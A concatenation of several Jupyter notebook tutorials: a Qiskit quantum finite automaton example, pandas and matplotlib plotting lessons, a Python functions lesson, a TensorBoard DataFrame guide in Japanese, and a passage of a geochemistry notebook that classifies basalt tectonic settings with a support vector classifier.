ClassicalRegister(n) #Creates a classical register for measurement qfaCircuit = QuantumCircuit(qr, cr) #Defining the circuit to take in the values of qr and cr for x in range(n): #For each qubit, we want to apply a series of unitary operations with a random int random_value = random.randint(1,prime - 1) #Generates the random int for each qubit from {1, prime -1} for letter in string: #For each letter in the string, we want to apply the same unitary operation to each qubit qfaCircuit.ry((2*math.pi*random_value) / prime, qr[x]) #Applies the Y-Rotation to each qubit qfaCircuit.measure(qr[x], cr[x]) #Measures each qubit return qfaCircuit #Returns the created quantum circuit ``` The qfa_algorithm function returns the Quantum Circuit qfaCircuit. ## Experiment with Simulators We can run the above circuit on the simulator. ``` #A function that returns a string saying if the string is accepted into the language or rejected def accept(parameter): states = list(result.get_counts(parameter)) for s in states: for integer in s: if integer == "1": return "Reject: the string is not accepted into the language" return "Accept: the string is accepted into the language" ``` Insert your own parameters and try even larger prime numbers. ``` range_lower = 0 range_higher = 36 prime_number = 11 for length in range(range_lower,range_higher): params = qfa_algorithm("a"* length, prime_number) job = execute(params, sim_backend, shots=1000) result = job.result() print(accept(params), "\n", "Length:",length," " ,result.get_counts(params)) ``` ### Drawing the circuit of the QFA Below is the snapshop of the QFA for reading the bitstring of length $3$. It can be seen that there are independent QFAs each of which performs $Y$ rotation for $3$ times. ``` circuit_drawer(qfa_algorithm("a"* 3, prime_number), style=qx_color_scheme()) ``` ## The Algorithm for Log(Log(p)) Qubits The algorithm is quite simple as follows. 1. Prepare a quantum register for $ log(log(p)) + 1 $ qubits initialized to zero. The $ log(log(p))$ qubits will act as your control bits and the 1 extra will act as your target bit. Also prepare a classical register for 1 bit to measure the target. $$ |0\ldots 0\rangle |0\rangle $$ 2. Hadamard the control bits to put them in a superposition so that we can perform multiple QFA's at the same time. 3. For each of $s $ states in the superposition, we can perform an individual QFA with the control qubits acting as the random integer $ k $ from the previous algorithm. Thus, we need $ n $ values from $ 1... log(p)$ for $ k $. For each letter $ i $ in the string, we perform a controlled y-rotation on the target qubit, where $ \theta $ is initially zero and $ \Phi $ is the angle of rotation for each unitary. $$ \Phi = \frac{2 \pi k_{s}}{p} $$ 4. The target qubit in the final state: $$ \cos \theta |0\rangle + \sin \theta |1\rangle $$ $$ \theta = \sum_{s=0}^n \frac{2 \pi k_{s}} p {i} $$ 5. Measure the target qubit in the classical register. If $ i $ divides $ p $, $ \cos \theta $ will be one for every QFA and the state of the target will collapse to $ |0\rangle $ to demonstrate an accept state with a probability of one. Otherwise, the output will consist of a small probability of accepting the string into the language and a higher probability of rejecting the string. ## The Circuit <a id="circuit"></a> We then use QISKit to program the algorithm. ``` #Function that takes in a prime number and a string of letters and returns a quantum circuit def qfa_controlled_algorithm(string, prime): if isprime(prime) == False: raise ValueError("This number is not a prime") #Raises a ValueError if the input prime number is not prime else: n = math.ceil((math.log(math.log(prime,2),2))) #Represents log(log(p)) control qubits states = 2 ** (n) #Number of states that the qubits can represent/Number of QFA's to be performed qr = QuantumRegister(n+1) #Creates a quantum register of log(log(prime)) control qubits + 1 target qubit cr = ClassicalRegister(1) #Creates a classical register of log(log(prime)) control qubits + 1 target qubit control_qfaCircuit = QuantumCircuit(qr, cr) #Defining the circuit to take in the values of qr and cr for q in range(n): #We want to take each control qubit and put them in a superposition by applying a Hadamard Gate control_qfaCircuit.h(qr[q]) for letter in string: #For each letter in the string, we want to apply a series of Controlled Y-rotations for q in range(n): control_qfaCircuit.cu3(2*math.pi*(2**q)/prime, 0, 0, qr[q], qr[n]) #Controlled Y on Target qubit control_qfaCircuit.measure(qr[n], cr[0]) #Measure the target qubit return control_qfaCircuit #Returns the created quantum circuit ``` The qfa_algorithm function returns the Quantum Circuit control_qfaCircuit. ## Experiment with Simulators We can run the above circuit on the simulator. ``` for length in range(range_lower,range_higher): params = qfa_controlled_algorithm("a"* length, prime_number) job = execute(params, sim_backend, shots=1000) result = job.result() print(accept(params), "\n", "Length:",length," " ,result.get_counts(params)) ``` ### Drawing the circuit of the QFA Below is the snapshot of the QFA for reading the bitstring of length $3$. It can be seen that there is a superposition of QFAs instead of independent QFAs. ``` circuit_drawer(qfa_controlled_algorithm("a"* 3, prime_number), style=qx_color_scheme()) ``` ## Experimenting with Real Devices Real-device backends have errors and if the above QFAs are executed on the noisy backends, errors in rejecting strings that should have been accepted can happen. Let us see how well the real-device backends can realize the QFAs. Let us look an example when the QFA should reject the bitstring because the length of the bitstring is not divisible by the prime number. ``` prime_number = 3 length = 2 # set the length so that it is not divisible by the prime_number print("The length of a is", length, " while the prime number is", prime_number) qfa1 = qfa_controlled_algorithm("a"* length, prime_number) %%qiskit_job_status HTMLProgressBar() job = execute(qfa1, backend=device_backend, coupling_map=device_coupling, shots=100) result = job.result() plot_histogram(result.get_counts()) ``` In the above, we can see that the probability of observing "1" is quite significant. Let us see how the circuit looks like. ``` circuit_drawer(qfa1, style=qx_color_scheme()) ``` Now, let us see what happens when the QFAs should accept the input string. ``` print_number = length = 3 # set the length so that it is divisible by the prime_number print("The length of a is", length, " while the prime number is", prime_number) qfa2 = qfa_controlled_algorithm("a"* length, prime_number) %%qiskit_job_status HTMLProgressBar() job = execute(qfa2, backend=device_backend, coupling_map=device_coupling, shots=100) result = job.result() plot_histogram(result.get_counts()) ``` The error of rejecting the bitstring is equal to the probability of observing "1" which can be checked from the above histogram. We can see that the noise of real-device backends prevents us to have a correct answer. It is left as future work on how to mitigate errors of the backends in the QFA models. ``` circuit_drawer(qfa2, style=qx_color_scheme()) ```
github_jupyter
<a href="https://colab.research.google.com/github/gumdropsteve/intro_to_python/blob/main/day_08/00_intro_to_python_visualizations.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # Visualization in Python Matplotlib with Pandas [.plot()](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.plot.html) ``` import pandas as pd # pd.read_parquet('https://github.com/gumdropsteve/datasets/blob/master/nyc_taxi/yellow_tripdata_2019-12.parquet?raw=true') df = pd.read_parquet('https://github.com/gumdropsteve/datasets/blob/master/nyc_taxi/yellow_tripdata_2019-12.parquet?raw=true') df.plot('passenger_count', 'trip_distance') df.tail() df.plot(kind='scatter', x='passenger_count', y='trip_distance') df.plot(kind='scatter', y='passenger_count', x='trip_distance') # df.plot(kind='scatter', x='tpep_pickup_datetime', y='passenger_count') # df.plot(kind='pie', y='payment_type') import pandas as pd df = pd.read_csv('https://github.com/gumdropsteve/datasets/raw/master/iris.csv') df ``` ### pandas .plot() is great but we start getting issues ``` # df.plot(kind='pie', y='species') df.plot(kind='pie', y='target') ``` ## It's time to import matplotlib How do they do it? ``` import matplotlib.pyplot as plt # Pie chart, where the slices will be ordered and plotted counter-clockwise: labels = 'Frogs', 'Hogs', 'Dogs', 'Logs' sizes = [15, 30, 45, 10] explode = (0, 0.1, 0, 0) # only "explode" the 2nd slice (i.e. 'Hogs') fig1, ax1 = plt.subplots() ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle. plt.show() ``` #### How do we apply that to our situation? ``` df['species'].unique() df['species'].value_counts() fig1, ax1 = plt.subplots() labels = [i for i in df['species'].unique()] sizes = [i for i in df['species'].value_counts()] fig1, ax1 = plt.subplots() ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) labels = [i for i in df['species'].unique()] sizes = [i for i in df['species'].value_counts()] fig1, ax1 = plt.subplots() ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) plt.show() ``` #### Can't copy? Try saving! https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.pyplot.savefig.html ``` labels = [i for i in df['species'].unique()] sizes = [i for i in df['species'].value_counts()] fig1, ax1 = plt.subplots() ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90) plt.savefig('test.png') from PIL import Image Image.open('test.png') ```
github_jupyter
<font size="+5">#01 | The Use of Functions</font> <div class="alert alert-warning"> <ul> <li> <b>Python</b> + <b>Data Science</b> Tutorials in ↓ <ul> <li> <a href="https://www.youtube.com/c/PythonResolver?sub_confirmation=1" >YouTube</a > </li> <li> <a href="https://blog.pythonresolver.com/">Blog</a> </li> <li> <a href="https://github.com/jsulopz/00-python-resolver-discipline">GitHub</a> </li> </ul> </li> <li> Author: <a href="https://twitter.com/jsulopz"><b>@jsulopz</b></a> </li> </ul> </div> # The Challenge <div class="alert alert-danger"> Load the following <strong>Excel</strong> file... </div> ![](src/excel.png) # The Covered Solution <div class="alert alert-success"> ...into <strong>Python ↓</strong> </div> ``` ?? # read the full story to find out the solution ``` # What will we learn? - Why the `function()` is so important in programming? - Which ways do you have to access **different types of `functions()`**? - How to find **solutions by filtering tutorials on Google**? - How to **get help from python** and use it wisely? # Which concepts will we use? - Module ~ Library - Dot notation - Objects - Variables ~ Instance - The Autocompletion Tool - The Docstring - Function - `object.function()` - `module.function()` - `built_in_function()` - [Google Method] # Requirements? - None # The starting *thing* ``` internet_usage_spain.xlsx ``` # Syllabus for the [Notebook](01script_functions.ipynb) 1. Default *things* in Python 2. Object-Oriented Programming 1. `string` 2. `integer` 3. `float` 4. `list` 1. The Python Resolver Discipline 2. Type of `functions()` 1. `Built-in` Functions 2. Functions inside `instances` 3. External Functions: from the `module` 1. Use of `functions()` 1. Change Default Parameters of a Function 2. The Elements of Programming 1. Code Syntax 1. The `module` 2. The `.` **DOT NOTATION** 3. The `function()` 4. The `(parameter=object)` 1. `(io='internet_usage_spain.xlsx')` 2. `(sheet_name=1)` 1. When you `execute`... 2. The `function()` returns an `object` 3. Recap 1. Source Code Execution | What happens <ins>inside</ins> the computer ? 2. The Importance of the `function()` 1. Python doesn't know about the Excel File 2. Other `functions()` 1. What have we learnt? 1. Why the `function()` is so important in programming? 2. Why have you got **different types of `functions()`**? 3. How to find **solutions by filtering tutorials on Google**? 4. How to **get help from python** and use it wisely? 1. Define the concepts ↓ # The Uncovered Solution 1. `module` - <font color="red">pandas</font> 2. `.` **DOT NOTATION** to look for *functions* inside the `module` or `instance` 3. `function()` - read_excel <font color="red">pandas</font> 4. pass `objects` to the `parameters` - pass `str ("internet_usage_spain.xlsx")` to `parameter (io=?)` - pass `int (1)` to `parameter (sheet_name=?)` 5. execute 6. [ ] magic? 7. the `function()` returns an `object` ``` import pandas as pd pd.read_excel(io='internet_usage_spain.xlsx', sheet_name=1) ```
github_jupyter
##### Copyright 2020 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ``` # TensorBoard の DataFrames データにアクセスする ## 概要 TensorBoard の主な機能はインタラクティブ GUI ですが、ログれーたの事後分析やカスタム視覚化の作成目的で、TensorBoard に保存されているデータログを **プログラムで** 読み取るユーザーもいます。 TensorBoard 2.3 は、`tensorboard.data.experimental.ExperimentFromDev()` でこのようなユースケースをサポートしており、TensorBoard の[スカラーログ](https://www.tensorflow.org/tensorboard/scalars_and_keras)にプログラムを使ってアクセスすることができます。このページでは、この新しい API の基本的な使用方法を実演します。 > **注意:** > > 1. この API は、名前空間で想像できるように、まだ実験段階にある API です。そのため、将来的に重大な変更が適用される場合があります。 > 2. 現在のところ、この機能は TensorBoard.dev にアップロードされる logdir のみをサポートしています。TensorBoard.dev は、TensorBoard の永続化と共有を可能にする無料のホステッドサービスです。ローカルに保存されている TensorBoard logdir のサポートは、今後追加される予定です。簡単に言うと、ローカルのファイルシステムに保存されている TensorBoard logdir を、1 行のコマンド(`tensorboard dev upload --logdir <logdir>`)で TensorBoard.dev にアップロードすることができます。詳細は、[tensorboard.dev](https://tensorboard.dev) をご覧ください。 ## セットアップ プログラマティック API を使用するには、`tensorboard` とともに `pandas` がインストールされていることを確認してください。 このガイドではカスタムプロットの作成に `matplotlib` と `seaborn` を使用しますが、任意のツールを使って `DataFrame` の分析と視覚化を行えます。 ``` !pip install tensorboard pandas !pip install matplotlib seaborn from packaging import version import pandas as pd from matplotlib import pyplot as plt import seaborn as sns from scipy import stats import tensorboard as tb major_ver, minor_ver, _ = version.parse(tb.__version__).release assert major_ver >= 2 and minor_ver >= 3, \ "This notebook requires TensorBoard 2.3 or later." print("TensorBoard version: ", tb.__version__) ``` ## `pandas.DataFrame` として TensorBoard スカラーを読み込む TensorBoard logdir が TensorBoard.dev にアップロードされると、logdir は「*実験*」となります。各実験には一意の ID が割り当てられており、実験の TensorBoard.dev URL で確認することができます。次のデモでは、https://tensorboard.dev/experiment/c1KCv3X3QvGwaXfgX1c4tg にある TensorBoard.dev を使用しています。 ``` experiment_id = "c1KCv3X3QvGwaXfgX1c4tg" experiment = tb.data.experimental.ExperimentFromDev(experiment_id) df = experiment.get_scalars() df ``` `df` は、実験のすべてのスカラーログを含む [`pandas.DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) です。 `DataFrame` の列は次のとおりです。 - `run`: run(実行)は、元の logdir のサブディレクトリに対応しています。この実験では、run は特定のオプティマイザタイプ(トレーニングハイパーパラメータ)を使用した MNIST データセットのニューラルネットワーク(CNN)の完全なトレーニングに由来しています。この `DataFrame` は、このような run が複数含まれており、別のオプティマイザタイプの配下にある反復トレーニングに対応しています。 - `tag`: これは、同一の行にある `value` の意味、つまり値が表現するメトリックが何であるかを記述しています。この実験では、`epoch_accuracy` と `epoch_loss` という、それぞれ精度と損失のメトリックに対応する 2 つのタグのみがあります。 - `step`: これは、run の中で対応する行のシリアル順を反映する番号です。ここでは、`step` は実際にエポック番号を指します。`step` 値とは別にタイムスタンプを取得する場合は、`get_scalars()` を呼び出す際にキーワード引数 `include_wall_time=True` を使用できます。 - `value`: これは関心のある実際の数値です。上述のとおり、この特定の `DataFrame` の各 `value` は、行の `tag` に応じて損失か精度になります。 ``` print(df["run"].unique()) print(df["tag"].unique()) ``` ## ピボット(ワイドフォーム)DataFrame を取得する この実験では、各実行の同じステップ時Iに 2 つのタグ(`epoch_loss` と `epoch_accuracy`)が存在します。このため、`pivot=True` キーワード引数を使用することで、「ワイドフォーム」`DataFrame` を `get_scalars()` から直接取得することができます。すべてのタグがワイドフォーム `DataFrame` の列として含まれているため、このケースを含み、場合によっては操作がより便利になります。 ただし、すべての実行のすべてのタグで統一したステップ値を持つ条件が満たされる場合、`pivot=True` を使用するとエラーになることに注意してください。 ``` dfw = experiment.get_scalars(pivot=True) dfw ``` ワイドフォーム DataFrame には、1 つの「value」列の代わりに、`epoch_accuracy` と `epoch_loss` の 2 つのタグ(メトリック)が列として明示的に含まれています。 ## DataFrame を CSV として保存する `pandas.DataFrame` has good interoperability with [CSV](https://en.wikipedia.org/wiki/Comma-separated_values). You can store it as a local CSV file and load it back later. For example: ``` csv_path = '/tmp/tb_experiment_1.csv' dfw.to_csv(csv_path, index=False) dfw_roundtrip = pd.read_csv(csv_path) pd.testing.assert_frame_equal(dfw_roundtrip, dfw) ``` ## カスタム視覚化と統計分析を実行する ``` # Filter the DataFrame to only validation data, which is what the subsequent # analyses and visualization will be focused on. dfw_validation = dfw[dfw.run.str.endswith("/validation")] # Get the optimizer value for each row of the validation DataFrame. optimizer_validation = dfw_validation.run.apply(lambda run: run.split(",")[0]) plt.figure(figsize=(16, 6)) plt.subplot(1, 2, 1) sns.lineplot(data=dfw_validation, x="step", y="epoch_accuracy", hue=optimizer_validation).set_title("accuracy") plt.subplot(1, 2, 2) sns.lineplot(data=dfw_validation, x="step", y="epoch_loss", hue=optimizer_validation).set_title("loss") ``` 上記のプロットは、検証精度と検証損失のタイムコースを示し、それぞれの曲線は、あるオプティマイザタイプによる 5 回の実行の平均を示します。`seaborn.lineplot()` に組み込まれた機能により、それぞれの曲線は、平均に関する ±1 の標準偏差も表示するため、曲線の変動性と 3 つのオプティマイザの差の重要性がわかりやすくなります。この変動性の視覚化は、TensorBoard の GUI ではまだサポートされていません。 最小検証損失が「adam」、「rmsprop」、および「sgd」オプティマイザ間で大きく異なるという仮説を調べるため、それぞれのオプティマイザにおける最小検証損失の DataFrame を抽出します。 そして、最小検証損失の差を視覚化する箱ひげ図を作成します。 ``` adam_min_val_loss = dfw_validation.loc[optimizer_validation=="adam", :].groupby( "run", as_index=False).agg({"epoch_loss": "min"}) rmsprop_min_val_loss = dfw_validation.loc[optimizer_validation=="rmsprop", :].groupby( "run", as_index=False).agg({"epoch_loss": "min"}) sgd_min_val_loss = dfw_validation.loc[optimizer_validation=="sgd", :].groupby( "run", as_index=False).agg({"epoch_loss": "min"}) min_val_loss = pd.concat([adam_min_val_loss, rmsprop_min_val_loss, sgd_min_val_loss]) sns.boxplot(data=min_val_loss, y="epoch_loss", x=min_val_loss.run.apply(lambda run: run.split(",")[0])) # Perform pairwise comparisons between the minimum validation losses # from the three optimizers. _, p_adam_vs_rmsprop = stats.ttest_ind( adam_min_val_loss["epoch_loss"], rmsprop_min_val_loss["epoch_loss"]) _, p_adam_vs_sgd = stats.ttest_ind( adam_min_val_loss["epoch_loss"], sgd_min_val_loss["epoch_loss"]) _, p_rmsprop_vs_sgd = stats.ttest_ind( rmsprop_min_val_loss["epoch_loss"], sgd_min_val_loss["epoch_loss"]) print("adam vs. rmsprop: p = %.4f" % p_adam_vs_rmsprop) print("adam vs. sgd: p = %.4f" % p_adam_vs_sgd) print("rmsprop vs. sgd: p = %.4f" % p_rmsprop_vs_sgd) ``` したがって、分析では、重要度レベル 0.05 で、最小検証損失が、実験に含まれるほかの 2 つのオプティマイザよりも rmsprop オプティマイザの方が大幅に高い(つまり悪化する)という仮説が実証されます。 まとめると、このチュートリアルでは、 TensorBoard.dev から `panda.DataFrame` のスカラーデータにアクセスする例を示しました。`DataFrame` を使用して行える柔軟で強力な分析と視覚化を実演しました。
github_jupyter
# Geochem for Machine Learning: Preprocessing and a Simple Classification Example In this notebook we'll provide a simple example of preprocessing some geochemical data for use in a classificaiton workflow. We'll also look at how this contrasts to more traditional methods of classification within geochemistry, and how programmatic workflows and tools can not only make this more robust, but also more reproducible. This exercise is adapted somewhat from earlier examples of the first author, here with a slightly different focus. The principal role of `pyrolite` in this example is for getting data in shape such that it's ready to be input into a machine learning workflow/pipeline (largely facilitated by [`scikit-learn`](https://scikit-learn.org/)), but we can also examine how a data-driven programmatic approach provides a number of advantages over other traditional methods - including reproducibility. ## Traditional Classification Methods in Geochemistry In geochemistry, classification is for historical reasons often treated as a graphical or two-dimensional problem for which the output includes a graphically-represented classification or discrimination diagram (driven by a need to visualize the data; e.g. [Pearce, 1973]; [Le Bas et al. 1992] ). And while many of these diagrams have been practically useful for 'binning' and describing rocks, the divisions we use don't necessarily make sense in the natural world (e.g. consider the Total Alkali - Silica diagram). Modern statistical and machine learning techniques can readily be applied to make better use of the data dimensionality and move beyond the human-centric limitations. In this case a data driven approach instead considers divisions according to the natural clustering of data, where they exist. ## Towards Multivariate Machine Classification Below we'll demonstrate a machine learning approach to classifying basalt geochemistry based on tectonic setting. We'll adapt a version of a support vector classifier, similar to those previously used for this problem ([Petrelli, 2016]; [Ueki, 2018]), and re-use the same 29-dimension tectonic discrimination dataset (just over 2000 samples taken from global repositories, each with majors, minors, traces and isotopes) from Ueki et al. (2018), modified to record the tectonic setting of each basalt in a 'Class' column. First let's examine a well-used trace element discrimination diagram (the Th-Nb-Yb diagram; [Pearce, 2008]) to get some insight what some of the key issues with classification using only a few elements or dimension. This is one of number of classification and tectonic diagrams have been developed which use specific geochemical proxies to link rock and mineral geochemistry to geological processes and reservoirs (here Nb/Yb and Th/Yb which distinguish relative enrichment of the mantle and arc-related processes). As the diagram presents only two dimensions (or three, depending who you talk to), the data presented show only part of the whole picture. This reduced dimensionality means that when you compare rocks from a variety of settings, you're likely to see large degrees of overlap, as found by [Li et al. (2015)], and shown below. While the diagram is not particularly useful as a classification tool, the proxies used (ratios or otherwise) still provide useful 'features' which can be added to datasets before constructing a multivariate classifier. | <img src="https://github.com/morganjwilliams/gs2020-diggingdeeper/raw/develop/img/Smithies2018Fig1.png" style="display:inline; margin: 0px 15px 15px 0px;" width="70%"/>|<img src="https://github.com/morganjwilliams/gs2020-diggingdeeper/raw/develop/img/Li2015Fig9.png" style="display:inline; margin: 0px 15px 15px 0px;" width="70%"/> | |--|--| | Figure from [Smithies (2018)] illustrating the main features of the Th-Yb-Nb diagram [Pearce (2008)], including the mantle or 'MORB-OIB array' and the 'modern arc array'. | Figure from [Li et al. (2015)], illustrating the significant degree of overlap in these two dimensions between different tectonic settings renders this approach futile for generalized discrimination. | <!--(BAB: Back Arc Basin, CA: Continental Arc, CFB: Continental Flood Basalt, IA: Island Arc, IOA: Intra-oceanic Arc, MOR: Mid-Ocean Ridge, OI: Ocean Island, OP: Oceanic Plateau) --> [Pearce, 1973]: https://doi.org/10.1016/0012-821X(73)90129-5 "Pearce, J.A., Cann, J.R., 1973. Tectonic setting of basic volcanic rocks determined using trace element analyses. Earth and Planetary Science Letters 19, 290–300. doi: 10.1016/0012-821X(73)90129-5" [Li et al. (2015)]: https://doi.org/10.1016/j.lithos.2015.06.022 "Li, C., Arndt, N.T., Tang, Q., Ripley, E.M., 2015. Trace element indiscrimination diagrams. Lithos 232, 76–83. " [Le Bas et al. 1992]: https://doi.org/10.1007/BF01160698 "Le Bas M. J., Le Maitre R. W. and Woolley A. R., 1992. The construction of the Total Alkali-Silica chemical classification of volcanic rocks. Mineral. Petrol. 46, 1–22." [Smithies (2018)]: https://doi.org/10.1016/j.epsl.2018.01.034 "Smithies, R.H., Ivanic, T.J., Lowrey, J.R., Morris, P.A., Barnes, S.J., Wyche, S., Lu, Y.-J., 2018. Two distinct origins for Archean greenstone belts. Earth and Planetary Science Letters 487, 106–116." [Pearce (2008)]: https://doi.org/10.1016/j.lithos.2007.06.016 "Pearce, J.A., 2008. Geochemical fingerprinting of oceanic basalts with applications to ophiolite classification and the search for Archean oceanic crust. Lithos 100, 14–48." [Pearce, 2008]: https://doi.org/10.1016/j.lithos.2007.06.016 "Pearce, J.A., 2008. Geochemical fingerprinting of oceanic basalts with applications to ophiolite classification and the search for Archean oceanic crust. Lithos 100, 14–48." [Petrelli, 2016]: https://doi.org/10.1007/s00410-016-1292-2 "Petrelli, M., Perugini, D., 2016. Solving petrological problems through machine learning: the study case of tectonic discrimination using geochemical and isotopic data. Contrib Mineral Petrol 171, 81." [Ueki, 2018]: https://doi.org/10.1029/2017GC007401 "Ueki, K., Hino, H., Kuwatani, T., 2018. Geochemical Discrimination and Characteristics of Magmatic Tectonic Settings: A Machine-Learning-Based Approach. Geochemistry, Geophysics, Geosystems 19, 1327–1347." ## Dataset and Preprocessing Here we go through a few simple preprocessing steps to get the dataset ready for input into our pipeline. For more on preprocessing (especially if you don't start from a nice data table like this one), [see the first example notebook on 'munging'](./01_munging.ipynb) ``` import pandas as pd import numpy as np import pyrolite.geochem from util import get_onedrive_directlink ueki_2018_dataset_url = get_onedrive_directlink("https://1drv.ms/u/s!As2ibEui13xmkqQLTMPI4hn4ACEc_w?e=cmcqU8") df = pd.read_csv(ueki_2018_dataset_url) df.head() df.columns ``` First we, can make sure that our different tectonic settings are represented in a readable way. Here we change `Cluster_ID` to contain an abbrevaition of the class name (BAB: Back Arc Basin, CA: Continental Arc, CFB: Continental Flood Basalt, IA: Island Arc, IOA: Intra-oceanic Arc, MOR: Mid-Ocean Ridge, OI: Ocean Island, OP: Oceanic Plateau): ``` classes = ["CA", "IA", "IOA", "BAB", "CFB", "MOR", "OP", "OI"] class_converter = {ix + 1: classes[ix] for ix in range(len(classes))} df["Cluster_ID"] = df["Cluster_ID"].apply(lambda x: class_converter[x]) df.pyrochem.add_ratio("Th/Yb") df.pyrochem.add_ratio("Nb/Yb"); df.head() compositional_variables = df.pyrochem.list_compositional abundances = [i for i in df.columns if i in compositional_variables] isotopes = [i for i in df.columns if i not in ["Cluster_ID", 'Number'] and i not in compositional_variables] classes = list(df.Cluster_ID.unique()) ``` ## A Simple Classifier For sake of illustration, we can build a simple classifier here and see what the minimum steps required to have a working model look like: ``` from sklearn.preprocessing import StandardScaler from sklearn.model_selection import train_test_split from sklearn.svm import SVC from sklearn.pipeline import make_pipeline from sklearn import set_config set_config(display='diagram') ``` First we need to decide what we wish to predict - in this case we want to predict the `Cluster_ID` using the element and oxide abundances together with the isotope ratios: ``` X, y = df.loc[:, abundances + isotopes], df["Cluster_ID"] ``` From this we can create some independent training and test sets so we can more accurately asses the performance of the model we're about to create and make sure our model is more generalisable: ``` X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, test_size=0.3) ``` Rather than use the data as-is, we should first scale it so that it's within the range which our classifier model is optimised for (typically -1 to 1 or so). Here we can use a standard scaler which normalises each of our variables to their respective mean and standard deviations. We can combine this with a classifier model and construct a pipeline. Here we've used a support vector classifier model (SVC), which should deal with our relatively limited dataset more readily than more complex models might: ``` svc_pipeline = make_pipeline(StandardScaler(), SVC()) svc_pipeline ``` We can now fit our simple classifer model, with the training data: ``` svc_pipeline.fit(X_train, y_train); ``` We can quickly check how well this classifier performs overall by seeing what percentage of our testing data it accurately classifies: ``` svcscore = svc_pipeline.score(X_test, y_test) "Overall Accuracy: {:.1f}%".format(svcscore*100) ``` That's not bad for a few lines of code and a fairly small dataset! ## Adding Some Detail We can improve on this simple model by adding in a few extra steps, parameters and details. Here we create a probabilistic equivalent of our SVC model, and independently process our abudnance and isotopic data to account for their naturally non-normal distributions. Additionally, we build a number of different models and choose the best of the bunch. First we'll build a pipeline, then put this within a grid search cross-validation optimizer which will search across a grid of specified parameter ranges to find a more optimal model. ``` from sklearn.compose import ColumnTransformer from pyrolite.util.skl.transform import CLRTransform, LogTransform # transform the abudnances and isotope ratios differently - accounting for their compositional and log-normal distributions, repsectively transform = ColumnTransformer([("abundances", CLRTransform(), abundances), ("isotopes", LogTransform(), isotopes)]) # make a scaler, as before scaler = StandardScaler() # build a one-versus-others radial basis function SVC which is calibrated for probabilistic output, and balances performance across classes clf = SVC(kernel="rbf", decision_function_shape="ovo", probability=True, class_weight="balanced") # put these together in a pipeline pipeline = make_pipeline(transform, scaler, clf) pipeline ``` Now we can put this in our gridsearch: ``` from sklearn.model_selection import StratifiedKFold, GridSearchCV param_grid = dict(svc__gamma=np.logspace(-2.3, -0.85, 8), svc__C=np.logspace(-0.5, 2.5, 8)) # limit C parameter to avoid overfitting gs = GridSearchCV(estimator=pipeline, param_grid=param_grid, cv=StratifiedKFold(n_splits=6, shuffle=True), n_jobs=4, verbose=3) gs ``` From here we'll train the various models over the parameter grid (building 64 different models, each 6 times): ``` gs.fit(X_train, y_train) ``` ## How does our model perform? We can see that our model peforms slightly better: ``` gridscore = gs.score(X_test, y_test) "Overall Accuracy: {:.1f}%".format(gridscore*100) ``` But more importantly, the model should be more generalizable, and should have more balanced performance across our classes. To look at this in a little more detail, we can examine the confusion matricies for each of our models - which examines how samples from the test set were predicted to fall, compared to their true classes. One thing to note here is that where samples are incorrectly classified, they tend to be incorrectly classified as from similar tecotnic settings. For example, back arc basin related samples are relatively commonly incorrectly classified as being form island arcs, intra-oceanic arcs and mid ocean ridges; all of these have geological and geochemical similarities to the back arc basin samples. ``` import matplotlib.pyplot as plt from pyrolite.util.skl.vis import plot_confusion_matrix fig, ax = plt.subplots(1, 2, figsize=(12, 5)) plot_confusion_matrix(svc_pipeline, X_test, y_test, normalize=True, ax=ax[0]) plot_confusion_matrix(gs.best_estimator_, X_test, y_test, normalize=True, ax=ax[1]) ax[0].set_title('Simple Pipeline') ax[1].set_title('Customised Pipeline') ``` ## How does this compare to a graphical classification equivalent? Revisiting the original scenario we described above, we can examine how our classifier does compared to e.g. the Pearce Th-Nb-Yb diagram at discriminating tectonic settings: ``` from pyrolite.plot.color import process_color from pyrolite.plot.templates import pearceThNbYb from pyrolite.util.plot.legend import proxy_line fig, ax = plt.subplots(1, figsize=(10, 6)) pearceThNbYb(ax) colors = process_color(gs.best_estimator_.predict(X.loc[:, abundances + isotopes]), cmap='tab10', alpha=0.8)['c'] for ID in df.Cluster_ID.unique(): subdf = df.loc[df.Cluster_ID==ID, :] subdf[['Nb/Yb', 'Th/Yb']].pyroplot.scatter(c=colors[df.Cluster_ID==ID], ax=ax, s=10, alpha=0.7) ax.legend([proxy_line(c=coll.get_facecolors()[0], marker='o', ls='none') for coll in ax.collections], df.Cluster_ID.unique(), frameon=False, facecolor=None) plt.show() ``` ## Probabilistic Outputs As we briefly mentioned above, we've used a probabilisitic version of a SVC model (calibrated using Platt scaling) to provide some probabilstic classificaiton outputs. We can examine what these look like for a selection of samples from the independed test set compared to their true tectonic settings. ``` samples = np.random.choice(np.arange(X_test.shape[0]), 8, replace=False) probs = ( pd.DataFrame( data=gs.best_estimator_.predict_proba(X_test.iloc[samples]), columns=gs.best_estimator_.classes_, ) * 100 ) probs["True Tectonic Setting"] = y_test.iloc[samples].tolist() table = probs[probs.columns[::-1]].round(2) table.style.background_gradient(cmap="Blues", axis=1) ``` While most of these are likely to be correctly classified - this provides some information which could be used to better understand the realistic performance of the model itself, as well as provide measures which can be linked to classificaiton uncertainty (get in touch if you want to know more on this front!). ## How can someone else use this on their own data? While it's great to be able to build your own models, you'll likely eventually want to share your workflow and potentially the models themselves (perhaps even to put it into an app!). In the first instance, you could easily share and re-use this notebook with someone else - and that's a great first step! Beyond this, to make it reproducible, you should also provide some information to control the enviornment in which models are being built - like the versions of the packages you're using, system the models are build on, and the 'version' of the notebook which is used. Others could then re-train a model with your data, or create a new model using your workflow with their own data. You can also save your models to disk and share them with others such that they can be loaded 